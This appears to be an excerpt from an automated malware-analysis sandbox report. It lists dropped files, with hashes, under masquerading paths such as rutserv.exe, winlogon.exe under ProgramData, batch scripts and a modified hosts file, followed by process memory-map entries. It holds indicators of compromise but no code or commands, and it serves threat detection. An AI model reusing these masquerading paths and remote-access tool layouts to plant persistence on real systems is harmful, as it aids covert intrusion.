C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\vp8decoder.dllMD5
88318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
C:\ProgramData\Windows\vp8encoder.dllMD5
6298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
C:\ProgramData\Windows\winit.exeMD5
701f0baf56e40757b2bf6dabcdcfc7aa
SHA1cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4
SHA2568e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370
SHA512e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190
-
C:\ProgramData\Windows\winit.exeMD5
701f0baf56e40757b2bf6dabcdcfc7aa
SHA1cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4
SHA2568e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370
SHA512e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190
-
C:\ProgramData\install\cheat.exeMD5
b8aa5d85128fe955865bfd130fd6ed63
SHA151119e37d2dc17eefdb6edb5d032fb77949038b8
SHA256cb18b89fdff97f6d3a7ec89456818163d21c24607b7b04cf513af0d03d804ac9
SHA512059b281e3d0f8f5d7004a82291d18be591468fcdb56c8b5122c1cc245425dcdfde4cfb229fc58a9a438532fdd293e73b87d9228753a670872d591aeb98f3e0c7
-
C:\Programdata\Install\del.batMD5
ed57b78906b32bcc9c28934bb1edfee2
SHA14d67f44b8bc7b1d5a010e766c9d81fb27cab8526
SHA256c3a1bd76b8539fdf83b723f85b6ea7cd35104b0ec14429774059208d2660177d
SHA512d2a95257e37b4b4154aec2234e31423632598a870d2bb803ce27cb242d5bdff5ea1b7475577245f80d3ad069872e9ae2adcd05d5145e081db864185a5e7bda33
-
C:\Programdata\RealtekHD\taskhostw.exeMD5
21feb5dccba8bf69df9a2307d206d033
SHA165fc243a3530225903bf422f19ffd0e3aad66f03
SHA256ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493
SHA512b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca
-
C:\Programdata\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\Programdata\Windows\install.batMD5
db76c882184e8d2bac56865c8e88f8fd
SHA1fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92
-
C:\Windows\System32\drivers\etc\hostsMD5
b9076f70dca294b9923436bf33e4152f
SHA155546d21f9d862327efc2429feb60b6f06d06390
SHA25608ecb17c34e18de4f133e2d183603a798b1b9670dc6f01bcceb750ff15d7230a
SHA512a31a57f536ec07914260ec43db831180bae30b0556f5d607465d0be82d098486dcae4a6b4a7db06ce811a62f8b97d3b03a809d14bda1e8b58365131cd545cdb0
-
C:\programdata\install\cheat.exeMD5
b8aa5d85128fe955865bfd130fd6ed63
SHA151119e37d2dc17eefdb6edb5d032fb77949038b8
SHA256cb18b89fdff97f6d3a7ec89456818163d21c24607b7b04cf513af0d03d804ac9
SHA512059b281e3d0f8f5d7004a82291d18be591468fcdb56c8b5122c1cc245425dcdfde4cfb229fc58a9a438532fdd293e73b87d9228753a670872d591aeb98f3e0c7
-
C:\programdata\microsoft\temp\H.batMD5
ec45b066a80416bdb06b264b7efed90d
SHA16679ed15133f13573c1448b5b16a4d83485e8cc9
SHA256cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e
SHA5120b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c
-
C:\rdp\pause.batMD5
a47b870196f7f1864ef7aa5779c54042
SHA1dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA25646565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60
-
C:\rdp\run.vbsMD5
6a5f5a48072a1adae96d2bd88848dcff
SHA1b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c
-
memory/492-196-0x0000000000000000-mapping.dmp
-
memory/496-123-0x0000000000000000-mapping.dmp
-
memory/680-136-0x0000000000000000-mapping.dmp
-
memory/680-139-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/680-140-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/680-148-0x0000000000AC0000-0x0000000000B6E000-memory.dmpFilesize
696KB
-
memory/736-213-0x0000000000000000-mapping.dmp
-
memory/788-128-0x0000000000000000-mapping.dmp
-
memory/852-199-0x0000000000000000-mapping.dmp
-
memory/872-127-0x0000000000000000-mapping.dmp
-
memory/888-203-0x0000000000000000-mapping.dmp
-
memory/968-206-0x0000000000000000-mapping.dmp
-
memory/996-175-0x0000000000000000-mapping.dmp
-
memory/1048-184-0x0000000000000000-mapping.dmp
-
memory/1068-197-0x0000000000000000-mapping.dmp
-
memory/1072-201-0x0000000000000000-mapping.dmp
-
memory/1072-118-0x0000000000000000-mapping.dmp
-
memory/1096-210-0x0000000000000000-mapping.dmp
-
memory/1160-208-0x0000000000000000-mapping.dmp
-
memory/1236-212-0x0000000000000000-mapping.dmp
-
memory/1292-230-0x0000029CD6F30000-0x0000029CD6F44000-memory.dmpFilesize
80KB
-
memory/1292-232-0x0000029CD8820000-0x0000029CD8840000-memory.dmpFilesize
128KB
-
memory/1292-231-0x0000029CD8800000-0x0000029CD8820000-memory.dmpFilesize
128KB
-
memory/1300-194-0x0000000000000000-mapping.dmp
-
memory/1316-147-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/1316-149-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/1316-152-0x0000000000B10000-0x0000000000B11000-memory.dmpFilesize
4KB
-
memory/1316-141-0x0000000000000000-mapping.dmp
-
memory/1360-181-0x0000000000000000-mapping.dmp
-
memory/1368-133-0x0000000000000000-mapping.dmp
-
memory/1408-189-0x0000000000000000-mapping.dmp
-
memory/1416-182-0x0000000000000000-mapping.dmp
-
memory/1460-150-0x0000000000000000-mapping.dmp
-
memory/1500-177-0x0000000000000000-mapping.dmp
-
memory/1504-185-0x0000000000000000-mapping.dmp
-
memory/1652-151-0x0000000000000000-mapping.dmp
-
memory/1732-186-0x0000000000000000-mapping.dmp
-
memory/1752-165-0x0000000000000000-mapping.dmp
-
memory/1836-164-0x0000000000000000-mapping.dmp
-
memory/2020-153-0x0000000000000000-mapping.dmp
-
memory/2020-155-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/2020-156-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/2020-159-0x0000000000C20000-0x0000000000C21000-memory.dmpFilesize
4KB
-
memory/2076-200-0x0000000000000000-mapping.dmp
-
memory/2076-174-0x0000000000000000-mapping.dmp
-
memory/2136-190-0x0000000000000000-mapping.dmp
-
memory/2176-191-0x0000000000000000-mapping.dmp
-
memory/2208-176-0x0000000000000000-mapping.dmp
-
memory/2280-187-0x0000000000000000-mapping.dmp
-
memory/2424-158-0x0000000000000000-mapping.dmp
-
memory/2520-132-0x0000000000000000-mapping.dmp
-
memory/2688-207-0x0000000000000000-mapping.dmp
-
memory/2692-130-0x0000000000000000-mapping.dmp
-
memory/2692-180-0x0000000000000000-mapping.dmp
-
memory/2792-202-0x0000000000000000-mapping.dmp
-
memory/2804-121-0x0000000000000000-mapping.dmp
-
memory/2824-204-0x0000000000000000-mapping.dmp
-
memory/2904-166-0x0000000000000000-mapping.dmp
-
memory/2924-160-0x0000000000000000-mapping.dmp
-
memory/2992-143-0x0000000000000000-mapping.dmp
-
memory/3068-157-0x0000000000000000-mapping.dmp
-
memory/3152-163-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/3152-171-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3152-162-0x0000000000400000-0x0000000000AB9000-memory.dmpFilesize
6.7MB
-
memory/3236-167-0x0000000000000000-mapping.dmp
-
memory/3256-179-0x0000000000000000-mapping.dmp
-
memory/3256-205-0x0000000000000000-mapping.dmp
-
memory/3260-183-0x0000000000000000-mapping.dmp
-
memory/3284-211-0x0000000000000000-mapping.dmp
-
memory/3440-142-0x0000000000000000-mapping.dmp
-
memory/3520-198-0x0000000000000000-mapping.dmp
-
memory/3684-195-0x0000000000000000-mapping.dmp
-
memory/3736-178-0x0000000000000000-mapping.dmp
-
memory/3792-172-0x0000000000000000-mapping.dmp
-
memory/3796-173-0x0000000000000000-mapping.dmp
-
memory/3948-170-0x0000000000000000-mapping.dmp
-
memory/3988-193-0x0000000000000000-mapping.dmp
-
memory/4016-188-0x0000000000000000-mapping.dmp
-
memory/4040-192-0x0000000000000000-mapping.dmp